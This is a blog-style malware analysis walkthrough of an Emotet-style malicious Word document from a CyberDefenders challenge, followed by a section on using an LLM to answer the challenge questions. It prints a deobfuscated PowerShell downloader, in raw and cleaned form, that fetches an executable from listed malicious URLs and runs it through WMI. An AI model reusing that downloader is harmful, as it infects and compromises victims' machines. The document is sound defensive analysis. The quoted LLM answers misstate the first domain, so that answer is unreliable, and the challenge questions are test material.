Malicious Doc 101

14 minute read

Introduction

After switching from exploit development back to security operations, I’ve turned my focus toward malware analysis. To start off as a refresher, I’ll be going through a basic malicious document analysis. The sample that I am analyzing was taken from CyberDefenders.

In this scenario, we are provided with a malicious document, tasked with analyzing its contents to determine its purpose and capabilities. I will be walking through how to manually analyze the file, and also demonstrate how we can leverage an LLM to automate the work of analysis.

Basic Tooling

During this walkthrough, I’ll be using REMnux, a reverse engineering Linux distro that comes preloaded with a curated toolset useful for malware analysis and triage. REMnux removes a lot of the setup friction (installing, configuring, and keeping analysis tools current) so you can focus on the analysis itself. It also helps keep your host clean by letting you run analysis in a controlled VM environment.

The main tools I’ll be using are oletools, which is a package of Python tools to analyze Microsoft OLE2 files (legacy Office documents). Two of the oletools utilities I rely on heavily are oledump.py and olevba. oledump.py is great for enumerating OLE streams and finding which streams contain macro code; olevba extracts and analyzes VBA macro source, highlights auto-execution patterns, and decodes common obfuscation.

oledump.py: A script to analyze OLE files (Compound File Binary Format) with a focus on analyzing streams of data.
olevba: A script to parse OLE and OpenXML files (e.g. Word, Excel), detect VBA Macros, extract source code, and flag suspicious patterns and IOCs.

Malicious Document Analysis

Gather Basic Knowledge

When working with a potentially malicious file, the first action will be transferring it to an analysis machine. In this case, I will be using a REMnux machine — mainly because I know the sample is malicious and REMnux bundles the tools I need (oletools, yara, strings, CyberChef offline workflows, etc.), offers a documented analysis environment, and lets me keep the work isolated from my daily driver. REMnux is a practical choice for quick static triage and keeps the setup consistent across analyses.

Once there, I gather information about the file. Initially with the file command.

Looking at the output, we see that this is a “Composite Document File”, i.e. an OLE file.

I also take the hash of the file and search it in VirusTotal.

remnux@remnux:~/Downloads/temp_extract_dir/MalDoc101$ sha256sum sample.bin 
d50d98dcc8b7043cb5c38c3de36a2ad62b293704e3cf23b0cd7450174df53fee  sample.bin

Looking into the VirusTotal information, we do see vendor scoring of the file and a family label (in this case Emotet as the sample appears in that family), plus a newer Code insights section that breaks down macros found in the document.

OLETools

Now that we’ve identified that this is an OLE file type, I’ll run olevba to gain additional insight. But first I used oledump.py to list streams - OLE streams are the primary containers where macro code, forms, and embedded blobs live. I’m specifically looking for streams with an m or M flag (macro-containing streams). In this sample streams 13, 15, and 16 were marked as macro streams:

remnux@remnux:~/Downloads/temp_extract_dir/MalDoc101$ oledump.py sample.bin 
      114 '\x01CompObj'
     4096 '\x05DocumentSummaryInformation'
     4096 '\x05SummaryInformation'
     7119 '1Table'
   101483 'Data'
      581 'Macros/PROJECT'
      119 'Macros/PROJECTwm'
    12997 'Macros/VBA/_VBA_PROJECT'
     2112 'Macros/VBA/__SRP_0'
      190 'Macros/VBA/__SRP_1'
      532 'Macros/VBA/__SRP_2'
      156 'Macros/VBA/__SRP_3'
M    1367 'Macros/VBA/diakzouxchouz'
      908 'Macros/VBA/dir'
M    5705 'Macros/VBA/govwiahtoozfaid'
m    1187 'Macros/VBA/roubhaol'
       97 'Macros/roubhaol/\x01CompObj'
      292 'Macros/roubhaol/\x03VBFrame'
      510 'Macros/roubhaol/f'
      112 'Macros/roubhaol/i05/\x01CompObj'
       44 'Macros/roubhaol/i05/f'
        0 'Macros/roubhaol/i05/o'
      112 'Macros/roubhaol/i07/\x01CompObj'
       44 'Macros/roubhaol/i07/f'
        0 'Macros/roubhaol/i07/o'
      115 'Macros/roubhaol/i09/\x01CompObj'
      176 'Macros/roubhaol/i09/f'
      110 'Macros/roubhaol/i09/i11/\x01CompObj'
       40 'Macros/roubhaol/i09/i11/f'
        0 'Macros/roubhaol/i09/i11/o'
      110 'Macros/roubhaol/i09/i12/\x01CompObj'
       40 'Macros/roubhaol/i09/i12/f'
        0 'Macros/roubhaol/i09/i12/o'
    15164 'Macros/roubhaol/i09/o'
       48 'Macros/roubhaol/i09/x'
      444 'Macros/roubhaol/o'
     4096 'WordDocument'

With that pointer we transition to olevba for extraction and analysis. olevba will pull macro source, flag auto-exec handlers, and try simple deobfuscation for known patterns - it’s an excellent first-pass static tool for macro analysis.

remnux@remnux:~/Downloads/temp_extract_dir/MalDoc101$ olevba sample.bin 
XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)
olevba 0.60.2 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: sample.bin
Type: OLE

Breaking down the output into sections, we get the following information.

Macros Detected

diakzouxchouz.cls
- Contains Document_Open() auto-execution event
- Calls function: boaxvoebxiotqueb
roubhaol.frm
- Empty macro body
- Contains suspicious form strings used later by the payload
govwiahtoozfaid.bas
- Main payload logic
- Defines multiple functions:
  - boaxvoebxiotqueb
  - juuvzouchmiopxeox
  - geulgelquuuj
  - luumlaud
- Suspicious behaviors:
  - Obfuscation via string concatenation and junk filler (2342772g3&*gs7712ffvs626fq)
  - Uses Replace$ and Split to dynamically rebuild strings
  - Builds object class names / ProgIDs at runtime
  - Calls CreateObject() → likely creates COM objects (e.g., WScript.Shell, MSXML2.XMLHTTP)
  - Stores object references into variables for later execution
  - Execution delay loops: Do While … DoEvents
  - Uses form properties (roubhaol.Zoom, .ControlTipText, .Pages) as hidden payload storage

Embedded Form Data

roubhaol form streams contain random/encoded strings:
- Examples: joopxof, caorfauxleir, foewdaibzian
- Long obfuscated sequences with repeated markers:
- Likely encoded payload or shellcode

Key Indicators of Maliciousness

Auto-execution: Document_Open() triggers on file open
Obfuscation: Heavy junk strings + dynamic string reconstruction
Dynamic Object Creation: Multiple CreateObject() calls with obfuscated class names
Hidden Payload: Encoded blobs in form strings (likely second-stage payload)
Anti-analysis tricks: Meaningless event loops with DoEvents

To summarize, this OLE document contains obfuscated VBA macros that will execute boaxvoebxiotqueb() when opened, via Document_Open(), to dynamically reconstruct and execute an embedded payload. The next step is to understand the contents of the encoded blob located in the roubhaol form.

Base64 Decode & Remove Null Bytes

The command is obfuscated with custom padding, Base64 encoding, and null bytes. The obfuscation marker we identified is 2342772g3&*gs7712ffvs626fq - which is repeatedly injected into the blob. By removing that padding string and any null bytes, then Base64-decoding, we recover the embedded PowerShell command.

Recognizing Base64 from the characters and trailing =, I used CyberChef recipes Base64 Decode + Remove Null Bytes to deobfuscate the blob and reveal the PowerShell payload…which was still obfuscated a little.

We end up with the following PowerShell command that attempts to hide its capabilities through string obfuscation, junk variables, and redundancy in URLs.

powershell -e
$liechrouhwuw='vuacdouvcioxhaol';
[Net.ServicePointManager]::"SE`cuRiTy`PRO`ToC`ol" = 'tls12, tls11, tls';
$deichbeudreir = '337';
$quoadgoijveum='duuvmoezhaitgoh';
$toehfethxohbaey=$env:userprofile+'\'+$deichbeudreir+'.exe';
$sienteed='quainquachloaz';
$reusthoas=.('n'+'ew-ob'+'ject') nEt.weBclIenT;
$jacleewyiqu='https://haoqunkong.com/bn/s9w4tgcjl_f6669ugu_w4bj/*https://www.techtravel.events/informationl/8lsjhrl6nnkwgyzsudzam_h3wng_a6v5/*http://digiwebmarketing.com/wp-admin/72t0jjhmv7takwvisfnz_eejvf_h6v2ix/*http://holfve.se/images/1ckw5mj49w_2k11px_d/*http://www.cfm.nl/_backup/yfhrmh6u0heidnwruwha2t4mjz6p_yxhyu390i6_q93hkh3ddm/'."s`PliT"([char]42);$seccierdeeth='duuzyeawpuaqu';
foreach($geersieb in $jacleewyiqu){try{$reusthoas."dOWN`loA`dfi`Le"($geersieb, $toehfethxohbaey);$buhxeuh='doeydeidquaijleuc';
If ((.('Get-'+'Ite'+'m') $toehfethxohbaey)."l`eNGTH" -ge 24751) {([wmiclass]'win32_Process')."C`ReaTe"($toehfethxohbaey);
$quoodteeh='jiafruuzlaolthoic';break;$chigchienteiqu='yoowveihniej'}}catch{}}$toizluulfier='foqulevcaoj'

Step-by-step breakdown of the PowerShell snippet:

Set target download path: %USERPROFILE%\337.exe
Configure TLS support for the web client
Build a WebClient and a list of candidate download URLs (multiple FQDNs concatenated and split)
Iterate through candidate URLs, attempt to download to local path
If the downloaded file size is at least 24,751 bytes, create a process via WMI (Win32_Process) to execute the payload
Break the loop once a valid payload is downloaded and executed

After relabeling variables and removing junk, the clear version looks like this:

powershell -e
[Net.ServicePointManager]::SecurityProtocol = 'tls12, tls11, tls'
$localFilePath = $env:userprofile + '\malware.exe'
$webClient = New-Object Net.WebClient
$malwareUrls = 'https://haoqunkong.com/bn/s9w4tgcjl_f6669ugu_w4bj/*https://www.techtravel.events/informationl/8lsjhrl6nnkwgyzsudzam_h3wng_a6v5/*http://digiwebmarketing.com/wp-admin/72t0jjhmv7takwvisfnz_eejvf_h6v2ix/*http://holfve.se/images/1ckw5mj49w_2k11px_d/*http://www.cfm.nl/_backup/yfhrmh6u0heidnwruwha2t4mjz6p_yxhyu390i6_q93hkh3ddm/'.Split([char]42)

foreach($currentUrl in $malwareUrls) {
    try {
        $webClient.DownloadFile($currentUrl, $localFilePath)
        If ((Get-Item $localFilePath).Length -ge 24751) {
            ([wmiclass]'win32_Process').Create($localFilePath)
            break
        }
    }
    catch {
    }
} 

Summary of Analysis

SHA256: d50d98dcc8b7043cb5c38c3de36a2ad62b293704e3cf23b0cd7450174df53fee
File type: OLE / Compound Document (legacy MS Office)
Macro streams found: Streams 13, 15, 16
Auto-exec trigger: Document_Open() in diakzouxchouz.cls
User form name (storage for embedded blob): roubhaol
Encoded blob location: Macros/roubhaol/i09/o (stream 34 contains the big encoded object)
Obfuscation marker/padding string: 2342772g3&*gs7712ffvs626fq (used to mask Base64 payload)
Decoded second-stage: Base64 → PowerShell encoded command (starts with powershell -e) that downloads an executable to %USERPROFILE%\337.exe and validates its size (>= 24,751 bytes)
Execution method for downloaded payload: WMI via Win32_Process (uses .Create() to run the binary)
Observed download domains (examples recovered from payload): haoqunkong.com, techtravel.events, digiwebmarketing.com, holfve.se, cfm.nl (block/monitor these and the specific paths seen in the blob)
Likely family / behavior: Commodity downloader/dropper behavior consistent with Emotet-style distribution (macro → PowerShell → downloader → execution). VirusTotal labels and sample metadata supported the family attribution in this case.

Using LLM to Automate

Now that we did it manually, let’s make it easier by using an LLM to do the work for us. In order to create my prompt, I will be using the R-T-F prompt framework, which stands for:

Role — tell the model who it should be (e.g., Senior Security Analyst). This sets expectations for tone, expertise, and what knowledge the model should emulate.
Task — specify exactly what the model must do (e.g., analyze the provided oledump.py and olevba outputs and extract IOCs, events, and filenames). This is the concrete work to perform.
Format — provide the exact output structure you want (e.g., numbered answers, a CSV, or a YAML IOC block). This prevents ambiguous or verbose responses and makes the results parseable by tools or humans.

Using R-T-F avoids generic prompts and makes results predictable and consistent across runs.

In order to provide the LLM with the required information to answer the questions, I saved the output of olevba and oledump.py to text files (Claude doesn’t accept executables) and supplied the SHA256 plus the text outputs as input.

My prompt was:

You are a Senior Security Analyst with the task of analyzing malware. You are given a malicious document to analyze. Provided to you is the SHA256Hash (d50d98dcc8b7043cb5c38c3de36a2ad62b293704e3cf23b0cd7450174df53fee), the output of oledump.py, and the output of olevba, answer the provided questions about the output. If needed, search online for virus databases for assistance.

Answer the following questions in this format:
Multiple streams contain macros in this document. Provide the number of the highest one. 
What event is used to begin the execution of the macros? 
What malware family was this maldoc attempting to drop? 
What stream is responsible for the storage of the base64-encoded string? 
This document contains a user-form. Provide the name. 
This document contains an obfuscated Base64 encoded string; what value is used to pad (or obfuscate) this string? 
What is the program executed by the Base64 encoded string? 
What WMI class is used to create the process to launch the Trojan? 
Multiple domains were contacted to download a Trojan. Provide the first FQDN as per the provided hint.

Pushed Enter, and not to my surprise, Claude nailed it!

Full Output:

Based on the analysis of the oledump.py and olevba outputs, here are the answers to your questions:

1. Multiple streams contain macros in this document. Provide the number of the highest one.
Answer: 16
From the oledump output, streams with macros are marked with 'M' or 'm':

Stream 13: M (Macros/VBA/diakzouxchouz)
Stream 15: M (Macros/VBA/govwiahtoozfaid)
Stream 16: m (Macros/VBA/roubhaol)

2. What event is used to begin the execution of the macros?
Answer: Document_open
The VBA code shows Private Sub Document_open() which is an AutoExec event that runs when the Word document is opened.

3. What malware family was this maldoc attempting to drop?
Answer: Emotet
Based on the obfuscation techniques, the base64-encoded PowerShell payload, and the multiple domain download attempts characteristic of Emotet malware distribution.

4. What stream is responsible for the storage of the base64-encoded string?
Answer: 34 (or Macros/roubhaol/i09/o)
The base64-encoded string with the padding "2342772g3&*gs7712ffvs626fq" is stored in stream 34, which corresponds to 'Macros/roubhaol/i09/o'.

5. This document contains a user-form. Provide the name.
Answer: roubhaol
The user form is named "roubhaol" as seen in the VBA MACRO roubhaol.frm and its associated streams.

6. This document contains an obfuscated Base64 encoded string; what value is used to pad (or obfuscate) this string?
*Answer: 2342772g3&gs7712ffvs626fq
This string is repeatedly used throughout the obfuscated base64 content to pad/obfuscate the actual payload.

7. What is the program executed by the Base64 encoded string?
Answer: powershell (or powershell.exe)
After removing the padding, the base64 string begins with "powershell -e" which indicates PowerShell is being executed with an encoded command.

8. What WMI class is used to create the process to launch the Trojan?
Answer: Win32_Process
The deobfuscated code creates "winmgmt:win32_process" (visible in the obfuscated string) which uses the Win32_Process WMI class to create processes.

9. Multiple domains were contacted to download a Trojan. Provide the first FQDN as per the provided hint.
Answer: haoqnonp[.]com
Looking at the base64 content and the embedded URLs, the first domain that appears in the list is "haoqnonp[.]com" (visible in the pattern "https[:]//haoqnonp.com/...").

Conclusion

This was a fairly straightforward MalDoc sample that used classic macro tricks: store an obfuscated Base64 blob inside a user form, use an auto-exec Document_Open handler to reconstruct and execute a PowerShell command, and then use PowerShell to download and execute a second-stage binary via WMI. The obfuscation is low-effort (a repeated padding string + Base64), so static analysis is sufficient to recover the payload and extract IOCs without executing the sample.

References

Share on

Twitter Facebook LinkedIn

Roy Blume